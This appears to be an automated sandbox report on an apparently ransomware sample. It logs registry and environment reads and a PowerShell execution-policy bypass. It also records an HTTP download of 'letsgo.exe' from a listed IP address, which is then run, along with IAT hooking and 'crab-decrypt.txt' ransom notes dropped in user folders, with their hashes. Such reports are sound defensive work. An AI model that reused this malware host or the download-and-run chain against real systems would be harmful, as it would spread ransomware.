Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 4
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\en-US\tzres.dll.mui base_address = 0x20801580001 True 3
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 2
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (275)
»
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 207
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 2
Fn
Sleep duration = -1 (infinite) True 2
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 31
Fn
Get Info type = Hardware Information True 31
Fn
Mutex (2)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 True 1
Fn
Release mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 True 1
Fn
Environment (72)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 27
Fn
Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_MinCount False 1
Fn
Get Environment String name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Get Environment String name = USERPROFILE, result_out = C:\Users\Nd9E1FYi True 2
Fn
Get Environment String name = PSModuleAutoLoadingPreference False 12
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 4
Fn
Get Environment String name = PATH True 1
Fn
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 4
Fn
Get Environment String name = PSDisableModuleAutoLoadingMemoryCache False 8
Fn
Get Environment String name = PSDisableModuleAutoloadingCacheMaintenance False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_MinCount False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.Connection_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.Connection_MinCount False 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 79 bytes
Total Data Received 278.76 KB
Contacted Host Count 1
Contacted Hosts 92.63.197.38
HTTP Session #1
»
Information Value
Server Name 92.63.197.38
Server Port 80
Data Sent 79
Data Received 285450
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = 92.63.197.38, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /letsgo.exe?LbPUer True 1
Fn
Send HTTP Request headers = host: 92.63.197.38, connection: Keep-Alive, url = 92.63.197.38/letsgo.exe?LbPUer True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 10424 True 1
Fn
Data
Read Response size = 65536, size_out = 31944 True 1
Fn
Data
Read Response size = 65536, size_out = 42108 True 1
Fn
Data
Read Response size = 65536, size_out = 5808 True 1
Fn
Data
Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Read Response size = 65536, size_out = 18876 True 1
Fn
Data
Read Response size = 65536, size_out = 15972 True 1
Fn
Data
Read Response size = 65536, size_out = 5576 True 1
Fn
Data
Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Read Response size = 65536, size_out = 65536 True 1
Fn
Data
Read Response size = 65536, size_out = 25940 True 1
Fn
Data
Read Response size = 53362, size_out = 53362 True 1
Fn
Data
Close Session - True 1
Fn
Process #6: roamingqtp35.exe
4721 22
»
Information Value
ID #6
File Name c:\users\nd9e1fyi\appdata\roamingqtp35.exe
Command Line "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:39, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:02:44
OS Process Information
»
Information Value
PID 0xfd8
Parent PID 0xe98 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x FDC
0x FE0
0x B24
0x D48
0x C84
0x 454
0x 740
0x 2C8
0x 618
0x E90
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00054fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00067fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00185fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00177fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001f5fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
roamingqtp35.exe 0x00400000 0x0044afff Memory Mapped File Readable, Writable, Executable True True False
...
private_0x0000000000450000 0x00450000 0x00450fff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable True False False -
locale.nls 0x00560000 0x0061dfff Memory Mapped File Readable False False False -
private_0x0000000000620000 0x00620000 0x0062ffff Private Memory Readable, Writable True False False -
private_0x0000000000630000 0x00630000 0x0066ffff Private Memory Readable, Writable True False False -
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x00a80fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a90000 0x00a90000 0x01e8ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001e90000 0x01e90000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001e90000 0x01e90000 0x01eb3fff Private Memory Readable, Writable True False False -
private_0x0000000001e90000 0x01e90000 0x01f1ffff Private Memory Readable, Writable True False False -
private_0x0000000001e90000 0x01e90000 0x01ecffff Private Memory Readable, Writable True False False -
private_0x0000000001ed0000 0x01ed0000 0x01ed0fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000001ed0000 0x01ed0000 0x01ed0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001ee0000 0x01ee0000 0x01ee0fff Private Memory Readable, Writable True False False -
private_0x0000000001ef0000 0x01ef0000 0x01ef0fff Private Memory Readable, Writable True False False -
private_0x0000000001f00000 0x01f00000 0x01f00fff Private Memory Readable, Writable True False False -
private_0x0000000001f10000 0x01f10000 0x01f1ffff Private Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f20fff Private Memory Readable, Writable True False False -
private_0x0000000001f30000 0x01f30000 0x01f30fff Private Memory Readable, Writable True False False -
private_0x0000000001f40000 0x01f40000 0x01f40fff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x01f50fff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x01f60fff Private Memory Readable, Writable True False False -
private_0x0000000001f70000 0x01f70000 0x01f70fff Private Memory Readable, Writable True False False -
private_0x0000000001f80000 0x01f80000 0x01f80fff Private Memory Readable, Writable True False False -
private_0x0000000001f90000 0x01f90000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x020a0fff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x0215ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x0209ffff Private Memory Readable, Writable True False False -
private_0x00000000020a0000 0x020a0000 0x020affff Private Memory Readable, Writable True False False -
private_0x00000000020a0000 0x020a0000 0x020b5fff Private Memory Readable, Writable True False False -
pagefile_0x00000000020a0000 0x020a0000 0x020a7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000020a0000 0x020a0000 0x020a0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000020b0000 0x020b0000 0x020b0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000020c0000 0x020c0000 0x020c7fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x020c0000 0x020c0fff Memory Mapped File Readable, Writable True True False
...
private_0x00000000020d0000 0x020d0000 0x0210ffff Private Memory Readable, Writable True False False -
private_0x0000000002110000 0x02110000 0x02112fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002110000 0x02110000 0x02127fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002120000 0x02120000 0x02122fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000002130000 0x02130000 0x02130fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000002140000 0x02140000 0x0214ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002150000 0x02150000 0x0215ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02160000 0x02496fff Memory Mapped File Readable False False False -
pagefile_0x00000000024a0000 0x024a0000 0x0289afff Pagefile Backed Memory Readable True False False -
ole32.dll 0x028a0000 0x02989fff Memory Mapped File Readable False False False -
private_0x00000000028a0000 0x028a0000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x00000000029a0000 0x029a0000 0x029dffff Private Memory Readable, Writable True False False -
private_0x00000000029e0000 0x029e0000 0x02adffff Private Memory Readable, Writable True False False -
private_0x0000000002ae0000 0x02ae0000 0x02b1ffff Private Memory Readable, Writable True False False -
private_0x0000000002b20000 0x02b20000 0x02c1ffff Private Memory Readable, Writable True False False -
private_0x0000000002c20000 0x02c20000 0x02c20fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c30000 0x02c30000 0x02c30fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c30000 0x02c30000 0x02c38fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c40000 0x02c40000 0x02c85fff Private Memory Readable, Writable True False False -
private_0x0000000002c40000 0x02c40000 0x02c40fff Private Memory Readable, Writable True False False -
private_0x0000000002c50000 0x02c50000 0x02c50fff Private Memory Readable, Writable True False False -
private_0x0000000002c50000 0x02c50000 0x02c51fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c60000 0x02c60000 0x02c60fff Private Memory Readable, Writable True False False -
private_0x0000000002c70000 0x02c70000 0x02c70fff Private Memory Readable, Writable True False False -
private_0x0000000002c70000 0x02c70000 0x02c73fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c80000 0x02c80000 0x02c82fff Private Memory Readable, Writable True False False -
private_0x0000000002c80000 0x02c80000 0x02cb2fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c90000 0x02c90000 0x02c90fff Private Memory Readable, Writable True False False -
private_0x0000000002ca0000 0x02ca0000 0x02ca0fff Private Memory Readable, Writable True False False -
private_0x0000000002cb0000 0x02cb0000 0x02cb0fff Private Memory Readable, Writable True False False -
private_0x0000000002cc0000 0x02cc0000 0x02cc2fff Private Memory Readable, Writable, Executable True False False -
wow64win.dll 0x5d0b0000 0x5d129fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x5d130000 0x5d17ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x5d180000 0x5d187fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x6f930000 0x6faadfff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x6fab0000 0x6fb4afff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x6fb50000 0x6fd5cfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x702b0000 0x702b7fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x702c0000 0x702d1fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x702e0000 0x702f8fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x70300000 0x7032efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x70330000 0x70342fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x70350000 0x7040efff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71770000 0x717b6fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x717c0000 0x717c7fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x717d0000 0x717fefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x71810000 0x71893fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x718a0000 0x718eefff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x71910000 0x71bdafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73a50000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x73d00000 0x73d91fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73da0000 0x73da9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73db0000 0x73dcdfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x741e0000 0x74237fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x74240000 0x7563efff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75640000 0x75645fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75650000 0x75693fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x756a0000 0x7575dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75780000 0x75811fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x758a0000 0x758adfff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x758b0000 0x758f4fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75900000 0x7592afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75bf0000 0x75ccffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x75cd0000 0x75e8cfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75ef0000 0x75f9cfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76110000 0x76256fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76270000 0x762a6fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x762b0000 0x762f3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x76300000 0x7630efff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76310000 0x7638afff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76390000 0x7650dfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76510000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x76600000 0x7668cfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76690000 0x76696fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76700000 0x7670bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76710000 0x7685efff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76860000 0x769d7fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x769e0000 0x76ed8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77080000 0x771fafff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ffc173fffff Private Memory Readable True False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc175c1000 0x7ffc175c1000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 212 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000460000:+0x72ecc 11. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCommTimeouts+0x0 now points to private_0x000000007fff0000:+0x51fd5215
...
IAT private_0x0000000000460000:+0x72ecc 15. entry of roamingqtp35.exe 4 bytes kernel32.dll:CompareStringA+0x0 now points to private_0x000000007fff0000:+0x52ddfb55
...
IAT private_0x0000000000460000:+0x72ecc 20. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x7b046002
...
IAT private_0x0000000000460000:+0x72ecc 21. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetConsoleOutputCP+0x0 now points to private_0x000000007fff0000:+0x7516097b
...
IAT private_0x0000000000460000:+0x72ecc 22. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x2046cd6
...
IAT private_0x0000000000460000:+0x72ecc 27. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetHandleCount+0x0 now points to private_0x000000007fff0000:+0x25161fce
...
IAT private_0x0000000000460000:+0x72ecc 30. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x7cd8fa5c
...
IAT private_0x0000000000460000:+0x72ecc 31. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x9242e76
...
IAT private_0x0000000000460000:+0x72ecc 32. entry of roamingqtp35.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x5dcf6b3b
...
IAT private_0x0000000000460000:+0x72ecc 33. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x7d6a5255
...
IAT private_0x0000000000460000:+0x72ecc 35. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x6c633147
...
IAT private_0x0000000000460000:+0x72ecc 36. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x750303f9
...
IAT private_0x0000000000460000:+0x72ecc 39. entry of roamingqtp35.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x7f836a17
...
IAT private_0x0000000000460000:+0x72ecc 40. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x4e7c1f04
...
IAT private_0x0000000000460000:+0x72ecc 42. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x57fd5c12
...
IAT private_0x0000000000460000:+0x72ecc 44. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x7d463088
...
IAT private_0x0000000000460000:+0x72ecc 49. entry of roamingqtp35.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x24ba1fce
...
IAT private_0x0000000000460000:+0x72ecc 50. entry of roamingqtp35.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x433a1203
...
IAT private_0x0000000000460000:+0x72ecc 73. entry of roamingqtp35.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x3a3e0fa5
...
IAT private_0x0000000000460000:+0x72ecc 76. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x936cdce
...
IAT private_0x0000000000460000:+0x72ecc 83. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStringTypeA+0x0 now points to private_0x000000007fff0000:+0xedafd55
...
IAT private_0x0000000000460000:+0x72ecc 86. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetDateFormatA+0x0 now points to private_0x000000007fff0000:+0x44872e26
...
IAT private_0x0000000000460000:+0x72ecc 90. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0xe5dea1e
...
IAT private_0x0000000000460000:+0x72ecc 92. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x26dafb13
...
IAT private_0x0000000000460000:+0x72ecc 96. entry of roamingqtp35.exe 4 bytes user32.dll:GetProcessWindowStation+0x0 now points to private_0x000000007fff0000:+0x3056d04
...
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\$recycle.bin\s-1-5-21-2172869166-1497266965-2109836178-1000\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
